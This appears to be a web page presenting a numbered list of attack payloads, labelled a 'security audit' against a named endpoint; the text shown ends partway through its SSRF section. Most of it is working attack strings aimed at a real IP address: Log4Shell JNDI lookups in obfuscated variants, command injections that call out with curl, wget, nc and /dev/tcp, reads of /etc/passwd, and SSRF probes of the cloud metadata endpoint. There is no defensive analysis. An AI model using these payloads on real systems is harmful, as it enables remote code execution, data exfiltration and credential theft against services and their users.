Gematria Security Audit v2

This page contains 1000 URL payload variants used for security research on the gematria numerology platform. Each link tests a different attack vector category to assess URL sanitization and filtering behavior.

Total payloads: 1000
Categories: 12
Target: pdftools.bot security analysis endpoint

Log4Shell / JNDI Lookup

w0 [JNDI] search=${jndi:ldap://62.84.182.119:1389/q0}
w1 [JNDI] x=${jndi:rmi://62.84.182.119/q1}
w2 [JNDI] query=${${lower:j}ndi:dns://62.84.182.119/q2}
w3 [JNDI] name=${${lower:jn}${lower:di}:ldaps://62.84.182.119/q3}
w4 [JNDI] test=${jndi:iiop://62.84.182.119:53/Exploit/q4}
w5 [JNDI] data=${j${::-n}di:ldap://62.84.182.119/q5}
w6 [JNDI] val=${jn${env:BARFOO:-d}i:rmi://62.84.182.119/q6}
w7 [JNDI] log=${jndi:dns://62.84.182.119:8888/Basic/q7}
w8 [JNDI] input=${${env:NaN:-j}ndi:ldaps://62.84.182.119/q8}
w9 [JNDI] ref=${jndi:iiop://62.84.182.119:53/callback/q9}
w10 [JNDI] search=${jndi:ldap://62.84.182.119:1389/q10}
w11 [JNDI] x=${jndi:rmi://62.84.182.119/q11}
w12 [JNDI] query=${${lower:j}ndi:dns://62.84.182.119/q12}
w13 [JNDI] name=${${lower:jn}${lower:di}:ldaps://62.84.182.119/q13}
w14 [JNDI] test=${jndi:iiop://62.84.182.119:53/Exploit/q14}
w15 [JNDI] data=${j${::-n}di:ldap://62.84.182.119/q15}
w16 [JNDI] val=${jn${env:BARFOO:-d}i:rmi://62.84.182.119/q16}
w17 [JNDI] log=${jndi:dns://62.84.182.119:8888/Basic/q17}
w18 [JNDI] input=${${env:NaN:-j}ndi:ldaps://62.84.182.119/q18}
w19 [JNDI] ref=${jndi:iiop://62.84.182.119:53/callback/q19}
w20 [JNDI] search=${jndi:ldap://62.84.182.119:1389/q20}
w21 [JNDI] x=${jndi:rmi://62.84.182.119/q21}
w22 [JNDI] query=${${lower:j}ndi:dns://62.84.182.119/q22}
w23 [JNDI] name=${${lower:jn}${lower:di}:ldaps://62.84.182.119/q23}
w24 [JNDI] test=${jndi:iiop://62.84.182.119:53/Exploit/q24}
w25 [JNDI] data=${j${::-n}di:ldap://62.84.182.119/q25}
w26 [JNDI] val=${jn${env:BARFOO:-d}i:rmi://62.84.182.119/q26}
w27 [JNDI] log=${jndi:dns://62.84.182.119:8888/Basic/q27}
w28 [JNDI] input=${${env:NaN:-j}ndi:ldaps://62.84.182.119/q28}
w29 [JNDI] ref=${jndi:iiop://62.84.182.119:53/callback/q29}
w30 [JNDI] search=${jndi:ldap://62.84.182.119:1389/q30}
w31 [JNDI] x=${jndi:rmi://62.84.182.119/q31}
w32 [JNDI] query=${${lower:j}ndi:dns://62.84.182.119/q32}
w33 [JNDI] name=${${lower:jn}${lower:di}:ldaps://62.84.182.119/q33}
w34 [JNDI] test=${jndi:iiop://62.84.182.119:53/Exploit/q34}
w35 [JNDI] data=${j${::-n}di:ldap://62.84.182.119/q35}
w36 [JNDI] val=${jn${env:BARFOO:-d}i:rmi://62.84.182.119/q36}
w37 [JNDI] log=${jndi:dns://62.84.182.119:8888/Basic/q37}
w38 [JNDI] input=${${env:NaN:-j}ndi:ldaps://62.84.182.119/q38}
w39 [JNDI] ref=${jndi:iiop://62.84.182.119:53/callback/q39}
w40 [JNDI] search=${jndi:ldap://62.84.182.119:1389/q40}
w41 [JNDI] x=${jndi:rmi://62.84.182.119/q41}
w42 [JNDI] query=${${lower:j}ndi:dns://62.84.182.119/q42}
w43 [JNDI] name=${${lower:jn}${lower:di}:ldaps://62.84.182.119/q43}
w44 [JNDI] test=${jndi:iiop://62.84.182.119:53/Exploit/q44}
w45 [JNDI] data=${j${::-n}di:ldap://62.84.182.119/q45}
w46 [JNDI] val=${jn${env:BARFOO:-d}i:rmi://62.84.182.119/q46}
w47 [JNDI] log=${jndi:dns://62.84.182.119:8888/Basic/q47}
w48 [JNDI] input=${${env:NaN:-j}ndi:ldaps://62.84.182.119/q48}
w49 [JNDI] ref=${jndi:iiop://62.84.182.119:53/callback/q49}
w50 [JNDI] search=${jndi:ldap://62.84.182.119:1389/q50}
w51 [JNDI] x=${jndi:rmi://62.84.182.119/q51}
w52 [JNDI] query=${${lower:j}ndi:dns://62.84.182.119/q52}
w53 [JNDI] name=${${lower:jn}${lower:di}:ldaps://62.84.182.119/q53}
w54 [JNDI] test=${jndi:iiop://62.84.182.119:53/Exploit/q54}
w55 [JNDI] data=${j${::-n}di:ldap://62.84.182.119/q55}
w56 [JNDI] val=${jn${env:BARFOO:-d}i:rmi://62.84.182.119/q56}
w57 [JNDI] log=${jndi:dns://62.84.182.119:8888/Basic/q57}
w58 [JNDI] input=${${env:NaN:-j}ndi:ldaps://62.84.182.119/q58}
w59 [JNDI] ref=${jndi:iiop://62.84.182.119:53/callback/q59}
w60 [JNDI] search=${jndi:ldap://62.84.182.119:1389/q60}
w61 [JNDI] x=${jndi:rmi://62.84.182.119/q61}
w62 [JNDI] query=${${lower:j}ndi:dns://62.84.182.119/q62}
w63 [JNDI] name=${${lower:jn}${lower:di}:ldaps://62.84.182.119/q63}
w64 [JNDI] test=${jndi:iiop://62.84.182.119:53/Exploit/q64}
w65 [JNDI] data=${j${::-n}di:ldap://62.84.182.119/q65}
w66 [JNDI] val=${jn${env:BARFOO:-d}i:rmi://62.84.182.119/q66}
w67 [JNDI] log=${jndi:dns://62.84.182.119:8888/Basic/q67}
w68 [JNDI] input=${${env:NaN:-j}ndi:ldaps://62.84.182.119/q68}
w69 [JNDI] ref=${jndi:iiop://62.84.182.119:53/callback/q69}
w70 [JNDI] search=${jndi:ldap://62.84.182.119:1389/q70}
w71 [JNDI] x=${jndi:rmi://62.84.182.119/q71}
w72 [JNDI] query=${${lower:j}ndi:dns://62.84.182.119/q72}
w73 [JNDI] name=${${lower:jn}${lower:di}:ldaps://62.84.182.119/q73}
w74 [JNDI] test=${jndi:iiop://62.84.182.119:53/Exploit/q74}
w75 [JNDI] data=${j${::-n}di:ldap://62.84.182.119/q75}
w76 [JNDI] val=${jn${env:BARFOO:-d}i:rmi://62.84.182.119/q76}
w77 [JNDI] log=${jndi:dns://62.84.182.119:8888/Basic/q77}
w78 [JNDI] input=${${env:NaN:-j}ndi:ldaps://62.84.182.119/q78}
w79 [JNDI] ref=${jndi:iiop://62.84.182.119:53/callback/q79}
w80 [JNDI] search=${jndi:ldap://62.84.182.119:1389/q80}
w81 [JNDI] x=${jndi:rmi://62.84.182.119/q81}
w82 [JNDI] query=${${lower:j}ndi:dns://62.84.182.119/q82}
w83 [JNDI] name=${${lower:jn}${lower:di}:ldaps://62.84.182.119/q83}
w84 [JNDI] test=${jndi:iiop://62.84.182.119:53/Exploit/q84}
w85 [JNDI] data=${j${::-n}di:ldap://62.84.182.119/q85}
w86 [JNDI] val=${jn${env:BARFOO:-d}i:rmi://62.84.182.119/q86}
w87 [JNDI] log=${jndi:dns://62.84.182.119:8888/Basic/q87}
w88 [JNDI] input=${${env:NaN:-j}ndi:ldaps://62.84.182.119/q88}
w89 [JNDI] ref=${jndi:iiop://62.84.182.119:53/callback/q89}
w90 [JNDI] search=${jndi:ldap://62.84.182.119:1389/q90}
w91 [JNDI] x=${jndi:rmi://62.84.182.119/q91}
w92 [JNDI] query=${${lower:j}ndi:dns://62.84.182.119/q92}
w93 [JNDI] name=${${lower:jn}${lower:di}:ldaps://62.84.182.119/q93}
w94 [JNDI] test=${jndi:iiop://62.84.182.119:53/Exploit/q94}
w95 [JNDI] data=${j${::-n}di:ldap://62.84.182.119/q95}
w96 [JNDI] val=${jn${env:BARFOO:-d}i:rmi://62.84.182.119/q96}
w97 [JNDI] log=${jndi:dns://62.84.182.119:8888/Basic/q97}
w98 [JNDI] input=${${env:NaN:-j}ndi:ldaps://62.84.182.119/q98}
w99 [JNDI] ref=${jndi:iiop://62.84.182.119:53/callback/q99}

Command Injection (curl/wget)

w100 [CMD-curl/wget] name=test;curl http://62.84.182.119:9999/q100
w101 [CMD-curl/wget] val=a$(curl http://62.84.182.119:9999/q101)
w102 [CMD-curl/wget] x=b|curl http://62.84.182.119:9999/q102
w103 [CMD-curl/wget] cmd=c`curl http://62.84.182.119:9999/q103`
w104 [CMD-curl/wget] file=d&&curl http://62.84.182.119:9999/q104
w105 [CMD-curl/wget] name=test;wget -q http://62.84.182.119:9999/q105
w106 [CMD-curl/wget] val=a$(wget -q -O- http://62.84.182.119:9999/q106)
w107 [CMD-curl/wget] x=b|wget -q -O- http://62.84.182.119:9999/q107
w108 [CMD-curl/wget] file=`wget -q -O- http://62.84.182.119:9999/q108`
w109 [CMD-curl/wget] cmd=d&&wget http://62.84.182.119:9999/q109
w110 [CMD-curl/wget] name=test;curl http://62.84.182.119:9999/q110
w111 [CMD-curl/wget] val=a$(curl http://62.84.182.119:9999/q111)
w112 [CMD-curl/wget] x=b|curl http://62.84.182.119:9999/q112
w113 [CMD-curl/wget] cmd=c`curl http://62.84.182.119:9999/q113`
w114 [CMD-curl/wget] file=d&&curl http://62.84.182.119:9999/q114
w115 [CMD-curl/wget] name=test;wget -q http://62.84.182.119:9999/q115
w116 [CMD-curl/wget] val=a$(wget -q -O- http://62.84.182.119:9999/q116)
w117 [CMD-curl/wget] x=b|wget -q -O- http://62.84.182.119:9999/q117
w118 [CMD-curl/wget] file=`wget -q -O- http://62.84.182.119:9999/q118`
w119 [CMD-curl/wget] cmd=d&&wget http://62.84.182.119:9999/q119
w120 [CMD-curl/wget] name=test;curl http://62.84.182.119:9999/q120
w121 [CMD-curl/wget] val=a$(curl http://62.84.182.119:9999/q121)
w122 [CMD-curl/wget] x=b|curl http://62.84.182.119:9999/q122
w123 [CMD-curl/wget] cmd=c`curl http://62.84.182.119:9999/q123`
w124 [CMD-curl/wget] file=d&&curl http://62.84.182.119:9999/q124
w125 [CMD-curl/wget] name=test;wget -q http://62.84.182.119:9999/q125
w126 [CMD-curl/wget] val=a$(wget -q -O- http://62.84.182.119:9999/q126)
w127 [CMD-curl/wget] x=b|wget -q -O- http://62.84.182.119:9999/q127
w128 [CMD-curl/wget] file=`wget -q -O- http://62.84.182.119:9999/q128`
w129 [CMD-curl/wget] cmd=d&&wget http://62.84.182.119:9999/q129
w130 [CMD-curl/wget] name=test;curl http://62.84.182.119:9999/q130
w131 [CMD-curl/wget] val=a$(curl http://62.84.182.119:9999/q131)
w132 [CMD-curl/wget] x=b|curl http://62.84.182.119:9999/q132
w133 [CMD-curl/wget] cmd=c`curl http://62.84.182.119:9999/q133`
w134 [CMD-curl/wget] file=d&&curl http://62.84.182.119:9999/q134
w135 [CMD-curl/wget] name=test;wget -q http://62.84.182.119:9999/q135
w136 [CMD-curl/wget] val=a$(wget -q -O- http://62.84.182.119:9999/q136)
w137 [CMD-curl/wget] x=b|wget -q -O- http://62.84.182.119:9999/q137
w138 [CMD-curl/wget] file=`wget -q -O- http://62.84.182.119:9999/q138`
w139 [CMD-curl/wget] cmd=d&&wget http://62.84.182.119:9999/q139
w140 [CMD-curl/wget] name=test;curl http://62.84.182.119:9999/q140
w141 [CMD-curl/wget] val=a$(curl http://62.84.182.119:9999/q141)
w142 [CMD-curl/wget] x=b|curl http://62.84.182.119:9999/q142
w143 [CMD-curl/wget] cmd=c`curl http://62.84.182.119:9999/q143`
w144 [CMD-curl/wget] file=d&&curl http://62.84.182.119:9999/q144
w145 [CMD-curl/wget] name=test;wget -q http://62.84.182.119:9999/q145
w146 [CMD-curl/wget] val=a$(wget -q -O- http://62.84.182.119:9999/q146)
w147 [CMD-curl/wget] x=b|wget -q -O- http://62.84.182.119:9999/q147
w148 [CMD-curl/wget] file=`wget -q -O- http://62.84.182.119:9999/q148`
w149 [CMD-curl/wget] cmd=d&&wget http://62.84.182.119:9999/q149
w150 [CMD-curl/wget] name=test;curl http://62.84.182.119:9999/q150
w151 [CMD-curl/wget] val=a$(curl http://62.84.182.119:9999/q151)
w152 [CMD-curl/wget] x=b|curl http://62.84.182.119:9999/q152
w153 [CMD-curl/wget] cmd=c`curl http://62.84.182.119:9999/q153`
w154 [CMD-curl/wget] file=d&&curl http://62.84.182.119:9999/q154
w155 [CMD-curl/wget] name=test;wget -q http://62.84.182.119:9999/q155
w156 [CMD-curl/wget] val=a$(wget -q -O- http://62.84.182.119:9999/q156)
w157 [CMD-curl/wget] x=b|wget -q -O- http://62.84.182.119:9999/q157
w158 [CMD-curl/wget] file=`wget -q -O- http://62.84.182.119:9999/q158`
w159 [CMD-curl/wget] cmd=d&&wget http://62.84.182.119:9999/q159
w160 [CMD-curl/wget] name=test;curl http://62.84.182.119:9999/q160
w161 [CMD-curl/wget] val=a$(curl http://62.84.182.119:9999/q161)
w162 [CMD-curl/wget] x=b|curl http://62.84.182.119:9999/q162
w163 [CMD-curl/wget] cmd=c`curl http://62.84.182.119:9999/q163`
w164 [CMD-curl/wget] file=d&&curl http://62.84.182.119:9999/q164
w165 [CMD-curl/wget] name=test;wget -q http://62.84.182.119:9999/q165
w166 [CMD-curl/wget] val=a$(wget -q -O- http://62.84.182.119:9999/q166)
w167 [CMD-curl/wget] x=b|wget -q -O- http://62.84.182.119:9999/q167
w168 [CMD-curl/wget] file=`wget -q -O- http://62.84.182.119:9999/q168`
w169 [CMD-curl/wget] cmd=d&&wget http://62.84.182.119:9999/q169
w170 [CMD-curl/wget] name=test;curl http://62.84.182.119:9999/q170
w171 [CMD-curl/wget] val=a$(curl http://62.84.182.119:9999/q171)
w172 [CMD-curl/wget] x=b|curl http://62.84.182.119:9999/q172
w173 [CMD-curl/wget] cmd=c`curl http://62.84.182.119:9999/q173`
w174 [CMD-curl/wget] file=d&&curl http://62.84.182.119:9999/q174
w175 [CMD-curl/wget] name=test;wget -q http://62.84.182.119:9999/q175
w176 [CMD-curl/wget] val=a$(wget -q -O- http://62.84.182.119:9999/q176)
w177 [CMD-curl/wget] x=b|wget -q -O- http://62.84.182.119:9999/q177
w178 [CMD-curl/wget] file=`wget -q -O- http://62.84.182.119:9999/q178`
w179 [CMD-curl/wget] cmd=d&&wget http://62.84.182.119:9999/q179
w180 [CMD-curl/wget] name=test;curl http://62.84.182.119:9999/q180
w181 [CMD-curl/wget] val=a$(curl http://62.84.182.119:9999/q181)
w182 [CMD-curl/wget] x=b|curl http://62.84.182.119:9999/q182
w183 [CMD-curl/wget] cmd=c`curl http://62.84.182.119:9999/q183`
w184 [CMD-curl/wget] file=d&&curl http://62.84.182.119:9999/q184
w185 [CMD-curl/wget] name=test;wget -q http://62.84.182.119:9999/q185
w186 [CMD-curl/wget] val=a$(wget -q -O- http://62.84.182.119:9999/q186)
w187 [CMD-curl/wget] x=b|wget -q -O- http://62.84.182.119:9999/q187
w188 [CMD-curl/wget] file=`wget -q -O- http://62.84.182.119:9999/q188`
w189 [CMD-curl/wget] cmd=d&&wget http://62.84.182.119:9999/q189
w190 [CMD-curl/wget] name=test;curl http://62.84.182.119:9999/q190
w191 [CMD-curl/wget] val=a$(curl http://62.84.182.119:9999/q191)
w192 [CMD-curl/wget] x=b|curl http://62.84.182.119:9999/q192
w193 [CMD-curl/wget] cmd=c`curl http://62.84.182.119:9999/q193`
w194 [CMD-curl/wget] file=d&&curl http://62.84.182.119:9999/q194
w195 [CMD-curl/wget] name=test;wget -q http://62.84.182.119:9999/q195
w196 [CMD-curl/wget] val=a$(wget -q -O- http://62.84.182.119:9999/q196)
w197 [CMD-curl/wget] x=b|wget -q -O- http://62.84.182.119:9999/q197
w198 [CMD-curl/wget] file=`wget -q -O- http://62.84.182.119:9999/q198`
w199 [CMD-curl/wget] cmd=d&&wget http://62.84.182.119:9999/q199

Command Injection (ping/nslookup)

w200 [CMD-ping] id=$(ping -c1 62.84.182.119)
w201 [CMD-ping] name=a;ping -c1 62.84.182.119
w202 [CMD-ping] val=b|ping -c1 62.84.182.119
w203 [CMD-ping] x=`ping -c1 62.84.182.119`
w204 [CMD-ping] test=c&&ping -c1 62.84.182.119
w205 [CMD-ping] id=$(nslookup q205.62.84.182.119)
w206 [CMD-ping] name=a;nslookup q206.62.84.182.119
w207 [CMD-ping] val=b|nslookup q207.62.84.182.119
w208 [CMD-ping] x=`nslookup q208.62.84.182.119`
w209 [CMD-ping] test=c&&nslookup q209.62.84.182.119
w210 [CMD-ping] id=$(ping -c1 62.84.182.119)
w211 [CMD-ping] name=a;ping -c1 62.84.182.119
w212 [CMD-ping] val=b|ping -c1 62.84.182.119
w213 [CMD-ping] x=`ping -c1 62.84.182.119`
w214 [CMD-ping] test=c&&ping -c1 62.84.182.119
w215 [CMD-ping] id=$(nslookup q215.62.84.182.119)
w216 [CMD-ping] name=a;nslookup q216.62.84.182.119
w217 [CMD-ping] val=b|nslookup q217.62.84.182.119
w218 [CMD-ping] x=`nslookup q218.62.84.182.119`
w219 [CMD-ping] test=c&&nslookup q219.62.84.182.119
w220 [CMD-ping] id=$(ping -c1 62.84.182.119)
w221 [CMD-ping] name=a;ping -c1 62.84.182.119
w222 [CMD-ping] val=b|ping -c1 62.84.182.119
w223 [CMD-ping] x=`ping -c1 62.84.182.119`
w224 [CMD-ping] test=c&&ping -c1 62.84.182.119
w225 [CMD-ping] id=$(nslookup q225.62.84.182.119)
w226 [CMD-ping] name=a;nslookup q226.62.84.182.119
w227 [CMD-ping] val=b|nslookup q227.62.84.182.119
w228 [CMD-ping] x=`nslookup q228.62.84.182.119`
w229 [CMD-ping] test=c&&nslookup q229.62.84.182.119
w230 [CMD-ping] id=$(ping -c1 62.84.182.119)
w231 [CMD-ping] name=a;ping -c1 62.84.182.119
w232 [CMD-ping] val=b|ping -c1 62.84.182.119
w233 [CMD-ping] x=`ping -c1 62.84.182.119`
w234 [CMD-ping] test=c&&ping -c1 62.84.182.119
w235 [CMD-ping] id=$(nslookup q235.62.84.182.119)
w236 [CMD-ping] name=a;nslookup q236.62.84.182.119
w237 [CMD-ping] val=b|nslookup q237.62.84.182.119
w238 [CMD-ping] x=`nslookup q238.62.84.182.119`
w239 [CMD-ping] test=c&&nslookup q239.62.84.182.119
w240 [CMD-ping] id=$(ping -c1 62.84.182.119)
w241 [CMD-ping] name=a;ping -c1 62.84.182.119
w242 [CMD-ping] val=b|ping -c1 62.84.182.119
w243 [CMD-ping] x=`ping -c1 62.84.182.119`
w244 [CMD-ping] test=c&&ping -c1 62.84.182.119
w245 [CMD-ping] id=$(nslookup q245.62.84.182.119)
w246 [CMD-ping] name=a;nslookup q246.62.84.182.119
w247 [CMD-ping] val=b|nslookup q247.62.84.182.119
w248 [CMD-ping] x=`nslookup q248.62.84.182.119`
w249 [CMD-ping] test=c&&nslookup q249.62.84.182.119
w250 [CMD-ping] id=$(ping -c1 62.84.182.119)
w251 [CMD-ping] name=a;ping -c1 62.84.182.119
w252 [CMD-ping] val=b|ping -c1 62.84.182.119
w253 [CMD-ping] x=`ping -c1 62.84.182.119`
w254 [CMD-ping] test=c&&ping -c1 62.84.182.119
w255 [CMD-ping] id=$(nslookup q255.62.84.182.119)
w256 [CMD-ping] name=a;nslookup q256.62.84.182.119
w257 [CMD-ping] val=b|nslookup q257.62.84.182.119
w258 [CMD-ping] x=`nslookup q258.62.84.182.119`
w259 [CMD-ping] test=c&&nslookup q259.62.84.182.119
w260 [CMD-ping] id=$(ping -c1 62.84.182.119)
w261 [CMD-ping] name=a;ping -c1 62.84.182.119
w262 [CMD-ping] val=b|ping -c1 62.84.182.119
w263 [CMD-ping] x=`ping -c1 62.84.182.119`
w264 [CMD-ping] test=c&&ping -c1 62.84.182.119
w265 [CMD-ping] id=$(nslookup q265.62.84.182.119)
w266 [CMD-ping] name=a;nslookup q266.62.84.182.119
w267 [CMD-ping] val=b|nslookup q267.62.84.182.119
w268 [CMD-ping] x=`nslookup q268.62.84.182.119`
w269 [CMD-ping] test=c&&nslookup q269.62.84.182.119
w270 [CMD-ping] id=$(ping -c1 62.84.182.119)
w271 [CMD-ping] name=a;ping -c1 62.84.182.119
w272 [CMD-ping] val=b|ping -c1 62.84.182.119
w273 [CMD-ping] x=`ping -c1 62.84.182.119`
w274 [CMD-ping] test=c&&ping -c1 62.84.182.119
w275 [CMD-ping] id=$(nslookup q275.62.84.182.119)
w276 [CMD-ping] name=a;nslookup q276.62.84.182.119
w277 [CMD-ping] val=b|nslookup q277.62.84.182.119
w278 [CMD-ping] x=`nslookup q278.62.84.182.119`
w279 [CMD-ping] test=c&&nslookup q279.62.84.182.119
w280 [CMD-ping] id=$(ping -c1 62.84.182.119)
w281 [CMD-ping] name=a;ping -c1 62.84.182.119
w282 [CMD-ping] val=b|ping -c1 62.84.182.119
w283 [CMD-ping] x=`ping -c1 62.84.182.119`
w284 [CMD-ping] test=c&&ping -c1 62.84.182.119
w285 [CMD-ping] id=$(nslookup q285.62.84.182.119)
w286 [CMD-ping] name=a;nslookup q286.62.84.182.119
w287 [CMD-ping] val=b|nslookup q287.62.84.182.119
w288 [CMD-ping] x=`nslookup q288.62.84.182.119`
w289 [CMD-ping] test=c&&nslookup q289.62.84.182.119
w290 [CMD-ping] id=$(ping -c1 62.84.182.119)
w291 [CMD-ping] name=a;ping -c1 62.84.182.119
w292 [CMD-ping] val=b|ping -c1 62.84.182.119
w293 [CMD-ping] x=`ping -c1 62.84.182.119`
w294 [CMD-ping] test=c&&ping -c1 62.84.182.119
w295 [CMD-ping] id=$(nslookup q295.62.84.182.119)
w296 [CMD-ping] name=a;nslookup q296.62.84.182.119
w297 [CMD-ping] val=b|nslookup q297.62.84.182.119
w298 [CMD-ping] x=`nslookup q298.62.84.182.119`
w299 [CMD-ping] test=c&&nslookup q299.62.84.182.119

Command Injection (misc)

w300 [CMD-misc] file=`id`
w301 [CMD-misc] name=$(whoami)
w302 [CMD-misc] val=a;cat /etc/passwd
w303 [CMD-misc] x=b|ls -la /
w304 [CMD-misc] cmd=${IFS}cat${IFS}/etc/passwd
w305 [CMD-misc] data=a;echo q305|nc 62.84.182.119 9999
w306 [CMD-misc] input=b$(echo q306|nc 62.84.182.119 9999)
w307 [CMD-misc] ref=c|bash -c 'echo q307'
w308 [CMD-misc] test=d;/bin/sh -c 'echo q308'
w309 [CMD-misc] log=e&&echo q309 > /dev/tcp/62.84.182.119/9999
w310 [CMD-misc] file=`id`
w311 [CMD-misc] name=$(whoami)
w312 [CMD-misc] val=a;cat /etc/passwd
w313 [CMD-misc] x=b|ls -la /
w314 [CMD-misc] cmd=${IFS}cat${IFS}/etc/passwd
w315 [CMD-misc] data=a;echo q315|nc 62.84.182.119 9999
w316 [CMD-misc] input=b$(echo q316|nc 62.84.182.119 9999)
w317 [CMD-misc] ref=c|bash -c 'echo q317'
w318 [CMD-misc] test=d;/bin/sh -c 'echo q318'
w319 [CMD-misc] log=e&&echo q319 > /dev/tcp/62.84.182.119/9999
w320 [CMD-misc] file=`id`
w321 [CMD-misc] name=$(whoami)
w322 [CMD-misc] val=a;cat /etc/passwd
w323 [CMD-misc] x=b|ls -la /
w324 [CMD-misc] cmd=${IFS}cat${IFS}/etc/passwd
w325 [CMD-misc] data=a;echo q325|nc 62.84.182.119 9999
w326 [CMD-misc] input=b$(echo q326|nc 62.84.182.119 9999)
w327 [CMD-misc] ref=c|bash -c 'echo q327'
w328 [CMD-misc] test=d;/bin/sh -c 'echo q328'
w329 [CMD-misc] log=e&&echo q329 > /dev/tcp/62.84.182.119/9999
w330 [CMD-misc] file=`id`
w331 [CMD-misc] name=$(whoami)
w332 [CMD-misc] val=a;cat /etc/passwd
w333 [CMD-misc] x=b|ls -la /
w334 [CMD-misc] cmd=${IFS}cat${IFS}/etc/passwd
w335 [CMD-misc] data=a;echo q335|nc 62.84.182.119 9999
w336 [CMD-misc] input=b$(echo q336|nc 62.84.182.119 9999)
w337 [CMD-misc] ref=c|bash -c 'echo q337'
w338 [CMD-misc] test=d;/bin/sh -c 'echo q338'
w339 [CMD-misc] log=e&&echo q339 > /dev/tcp/62.84.182.119/9999
w340 [CMD-misc] file=`id`
w341 [CMD-misc] name=$(whoami)
w342 [CMD-misc] val=a;cat /etc/passwd
w343 [CMD-misc] x=b|ls -la /
w344 [CMD-misc] cmd=${IFS}cat${IFS}/etc/passwd
w345 [CMD-misc] data=a;echo q345|nc 62.84.182.119 9999
w346 [CMD-misc] input=b$(echo q346|nc 62.84.182.119 9999)
w347 [CMD-misc] ref=c|bash -c 'echo q347'
w348 [CMD-misc] test=d;/bin/sh -c 'echo q348'
w349 [CMD-misc] log=e&&echo q349 > /dev/tcp/62.84.182.119/9999
w350 [CMD-misc] file=`id`
w351 [CMD-misc] name=$(whoami)
w352 [CMD-misc] val=a;cat /etc/passwd
w353 [CMD-misc] x=b|ls -la /
w354 [CMD-misc] cmd=${IFS}cat${IFS}/etc/passwd
w355 [CMD-misc] data=a;echo q355|nc 62.84.182.119 9999
w356 [CMD-misc] input=b$(echo q356|nc 62.84.182.119 9999)
w357 [CMD-misc] ref=c|bash -c 'echo q357'
w358 [CMD-misc] test=d;/bin/sh -c 'echo q358'
w359 [CMD-misc] log=e&&echo q359 > /dev/tcp/62.84.182.119/9999
w360 [CMD-misc] file=`id`
w361 [CMD-misc] name=$(whoami)
w362 [CMD-misc] val=a;cat /etc/passwd
w363 [CMD-misc] x=b|ls -la /
w364 [CMD-misc] cmd=${IFS}cat${IFS}/etc/passwd
w365 [CMD-misc] data=a;echo q365|nc 62.84.182.119 9999
w366 [CMD-misc] input=b$(echo q366|nc 62.84.182.119 9999)
w367 [CMD-misc] ref=c|bash -c 'echo q367'
w368 [CMD-misc] test=d;/bin/sh -c 'echo q368'
w369 [CMD-misc] log=e&&echo q369 > /dev/tcp/62.84.182.119/9999
w370 [CMD-misc] file=`id`
w371 [CMD-misc] name=$(whoami)
w372 [CMD-misc] val=a;cat /etc/passwd
w373 [CMD-misc] x=b|ls -la /
w374 [CMD-misc] cmd=${IFS}cat${IFS}/etc/passwd
w375 [CMD-misc] data=a;echo q375|nc 62.84.182.119 9999
w376 [CMD-misc] input=b$(echo q376|nc 62.84.182.119 9999)
w377 [CMD-misc] ref=c|bash -c 'echo q377'
w378 [CMD-misc] test=d;/bin/sh -c 'echo q378'
w379 [CMD-misc] log=e&&echo q379 > /dev/tcp/62.84.182.119/9999
w380 [CMD-misc] file=`id`
w381 [CMD-misc] name=$(whoami)
w382 [CMD-misc] val=a;cat /etc/passwd
w383 [CMD-misc] x=b|ls -la /
w384 [CMD-misc] cmd=${IFS}cat${IFS}/etc/passwd
w385 [CMD-misc] data=a;echo q385|nc 62.84.182.119 9999
w386 [CMD-misc] input=b$(echo q386|nc 62.84.182.119 9999)
w387 [CMD-misc] ref=c|bash -c 'echo q387'
w388 [CMD-misc] test=d;/bin/sh -c 'echo q388'
w389 [CMD-misc] log=e&&echo q389 > /dev/tcp/62.84.182.119/9999
w390 [CMD-misc] file=`id`
w391 [CMD-misc] name=$(whoami)
w392 [CMD-misc] val=a;cat /etc/passwd
w393 [CMD-misc] x=b|ls -la /
w394 [CMD-misc] cmd=${IFS}cat${IFS}/etc/passwd
w395 [CMD-misc] data=a;echo q395|nc 62.84.182.119 9999
w396 [CMD-misc] input=b$(echo q396|nc 62.84.182.119 9999)
w397 [CMD-misc] ref=c|bash -c 'echo q397'
w398 [CMD-misc] test=d;/bin/sh -c 'echo q398'
w399 [CMD-misc] log=e&&echo q399 > /dev/tcp/62.84.182.119/9999

Server-Side Request Forgery

w400 [SSRF] url=http://62.84.182.119:9999/q400
w401 [SSRF] redirect=http://62.84.182.119:9999/q401
w402 [SSRF] dest=http://62.84.182.119:9999/q402
w403 [SSRF] target=http://127.0.0.1:8080/q403
w404 [SSRF] proxy=http://169.254.169.254/latest/meta-data/q404
w405 [SSRF] callback=http://62.84.182.119:9999/q405
w406 [SSRF] next=http://62.84.182.119:9999/q406
w407 [SSRF] return=http://62.84.182.119:9999/q407
w408 [SSRF] website=http://62.84.182.119:9999/q408
w409 [SSRF] uri=http://62.84.182.119:9999/q409&format=json
w410 [SSRF] url=http://62.84.182.119:9999/q410
w411 [SSRF] redirect=http://62.84.182.119:9999/q411
w412 [SSRF] dest=http://62.84.182.119:9999/q412
w413 [SSRF] target=http://127.0.0.1:8080/q413
w414 [SSRF] proxy=http://169.254.169.254/latest/meta-data/q414
w415 [SSRF] callback=http://62.84.182.119:9999/q415
w416 [SSRF] next=http://62.84.182.119:9999/q416
w417 [SSRF] return=http://62.84.182.119:9999/q417
w418 [SSRF] website=http://62.84.182.119:9999/q418
w419 [SSRF] uri=http://62.84.182.119:9999/q419&format=json
w420 [SSRF] url=http://62.84.182.119:9999/q420
w421 [SSRF] redirect=http://62.84.182.119:9999/q421
w422 [SSRF] dest=http://62.84.182.119:9999/q422
w423 [SSRF] target=http://127.0.0.1:8080/q423
w424 [SSRF] proxy=http://169.254.169.254/latest/meta-data/q424
w425 [SSRF] callback=http://62.84.182.119:9999/q425
w426 [SSRF] next=http://62.84.182.119:9999/q426
w427 [SSRF] return=http://62.84.182.119:9999/q427
w428 [SSRF] website=http://62.84.182.119:9999/q428
w429 [SSRF] uri=http://62.84.182.119:9999/q429&format=json
w430 [SSRF] url=http://62.84.182.119:9999/q430
w431 [SSRF] redirect=http://62.84.182.119:9999/q431
w432 [SSRF] dest=http://62.84.182.119:9999/q432
w433 [SSRF] target=http://127.0.0.1:8080/q433
w434 [SSRF] proxy=http://169.254.169.254/latest/meta-data/q434
w435 [SSRF] callback=http://62.84.182.119:9999/q435
w436 [SSRF] next=http://62.84.182.119:9999/q436
w437 [SSRF] return=http://62.84.182.119:9999/q437
w438 [SSRF] website=http://62.84.182.119:9999/q438
w439 [SSRF] uri=http://62.84.182.119:9999/q439&format=json
w440 [SSRF] url=http://62.84.182.119:9999/q440
w441 [SSRF] redirect=http://62.84.182.119:9999/q441
